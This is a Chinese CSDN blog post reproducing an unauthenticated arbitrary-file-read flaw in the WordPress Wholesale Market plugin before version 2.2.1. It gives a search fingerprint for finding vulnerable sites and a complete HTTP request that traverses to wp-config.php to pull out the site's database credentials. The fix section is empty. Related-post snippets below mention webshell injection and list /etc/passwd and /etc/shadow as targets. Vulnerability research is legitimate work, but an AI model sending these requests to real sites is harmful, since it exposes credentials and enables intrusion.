【漏洞复现】Wordpress_Wholesale任意文件读取

最新推荐文章于 2024-08-03 15:46:29 发布
最新推荐文章于 2024-08-03 15:46:29 发布
阅读量421 收藏 7
点赞数 4
文章标签: 网络安全 渗透测试 web安全 安全测试 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/138369901
版权
这篇文章揭示了WordPressWholesaleMarket插件的一个未经授权的路径遍历漏洞,攻击者可通过恶意请求下载服务器文件。提供了一个POC示例和强调了安全修复的重要性,提醒用户更新到最新版本以防止此类攻击。
摘要由CSDN通过智能技术生成

漏洞描述

WordPress plugin Wholesale Market 是一个woocommerce扩展插件,使您的商店能够创建批发用户,并通过设置产品的批发价格。
WordPress plugin Wholesale Market 2.2.1之前版本存在路径遍历漏洞,该漏洞源于没有进行授权检查,也不会验证用户输入。攻击者利用该漏洞可以从服务器下载任意文件。
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

漏洞集合

【传送点】上千漏洞复现复现集合 exp poc 持续更新

资产确定

body="wp-content/plugins/wholesale-market"

漏洞复现

在这里插入图片描述

POC如下

GET /wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin&section=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

修复方案

丢了少年失了心1
关注
漏洞复现WordPress_Wholesale_Market admin-ajax.php 任意文件读取漏洞
qq_67810151的博客
04-21 418
WordPress Wholesale Market存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取服务器文件,造成敏感信息泄露。
漏洞复现WordPress Welcart 任意文件读取漏洞(CVE-2022-4140)
qq_67810151的博客
04-10 449
Welcart存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取任意文件,获取服务器敏感信息。
0day-未公开漏洞-wordpress wholesale market 文件读取漏洞
weixin_43167326的博客
03-19 648
WordPress plugin Wholesale Market 是一个woocommerce扩展插件,使您的商店能够创建批发用户,并通过设置产品的批发价格。wordpress wholesale market 存在文件读取漏洞
WordPress--漏洞复现
最新发布
weixin_57682301的博客
08-03 242
3.将文件内容改为我们的一句话木马,点击更新文件。4.访问这个文件显示出phpinfo证明注入成功。1.搭建好环境进入后台登录界面登录管理员。2.进入后选择外观---编辑。
漏洞复现WordPress——Recall——SQL注入(CVE-2024-32709)
LongL_GuYu的博客
07-11 1036
Plechev Andrey WP-Recall存在SQL注入漏洞。该漏洞影响WP-Recall版本从n/a到16.26.5。攻击者可以利用该漏洞在SQL命令中不恰当地中立化特殊元素,造成数据库被恶意操作的风险。
任意文件读取漏洞理解
weixin_51559599的博客
11-14 137
任意文件读取漏洞是一种安全漏洞,允许攻击者通过输入特定的文件路径来读取系统上的任意文件,包括敏感文件和配置文件
允许 WordPress 上传任意文件的方法
09-29
针对这个问题,有两种方法可以解决,使得WordPress用户能够上传任意文件。 第一个方法是直接修改WordPress的核心配置文件wp-config.php,通过在该文件中添加一行代码:define('ALLOW_UNFILTERED_UPLOADS', true); ...
seacms和wordpress漏洞复现
xixixi
09-25 1043
seacms-6.45 安装 版本:6.45 源码下载 到安装说明里面将其安装,如果安装了wamp或者phpstudy应该很简单了,不赘述。 一些需要知道的小知识 str_replace('a','b',$content)是将$content中的'a'替换成'b' join(数组a)是将a中的元素拼接成一个字符串 addslashes($a)转义a的每个双引号 strpos($a,$b)在$a中查...
wordpresss任意文件删除漏洞复现
xy_sugar的博客
03-19 786
环境搭建(phpstudy) ​ 进入后台后,点击Media(媒体),在点击Add New (添加) ​ 进入到上传文件位置 ​ 选择一张图片上传然后点击编辑,页面跳转到如下图所示​ 然后用插件查找post.php,找到_wpnonce的值为d6c958e911 用hackbar对数据包进行修改 然后在burpsuite里面重放,发送成功返回302状态 此时在...
用XML-RPC协议WordPress上的文章
adermxl的专栏
11-15 5098
WordPress提供了XML-RPC接口使得第三方的博客写作软件(如windows live writer等)可以与之通信来发布和修改博客。我们也可以在网站上使用这个接口做一些工作,例如:在网站首页显示最新的博客、在博客之外的页面上发表博客文章、把博客与其他内容管理系统结合,等等。 一、开启XML-RPC支持 XML-RPC协议默认是未开启的,需要到WordPress管理后台
漏洞复现-wordpress RCE-CVE-2024-25600
04-12 602
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
【打靶练习】vulnhub: stapler
守拙的博客
03-28 491
密码爆破 文件读取 多看看 wp-content/uploads/ 目录 历史命令 http和https
WordPress4.6命令执行漏洞(CVE-2016-10033)复现教程---保姆级教程
爱吃仡坨的Blog
09-11 3655
WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,(phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload)造成远程命令执行的
Wordpress漏洞复现
weixin_52194536的博客
09-10 9187
cms漏洞
CMS知识小结及wordpress的安装与漏洞复现
人若有志,就不会在半坡停止。
09-11 2751
CMS是Content Management System的缩写,意为"内容管理系统",是一种帮助用户创建、管理和修改网站内容而无需专业技术知识的软件。内容管理系统是一种位于WEB 前端(Web服务器)和后端办公系统或流程(内容创作、编辑)之间的软件系统。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。这里指的“内容”可能包括文件、表格、图片、数据库中的数据甚至视频等一切你想要发布到Internet、Intranet以及Extranet(外网)网站的信息。
乌云漏洞笔记1-任意文件读取
乐枕的家
01-22 5772
时间16.01.18 page1-3 敏感字段&RealPath= &FilePath= &filepath= &Path= &path= &inputFile= &url= &urls= &Lang= &dis= &data= &readfile= &filep= &src= &menu= META-INF WEB-INF可利用路径/etc/shadow /etc/passwd /
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值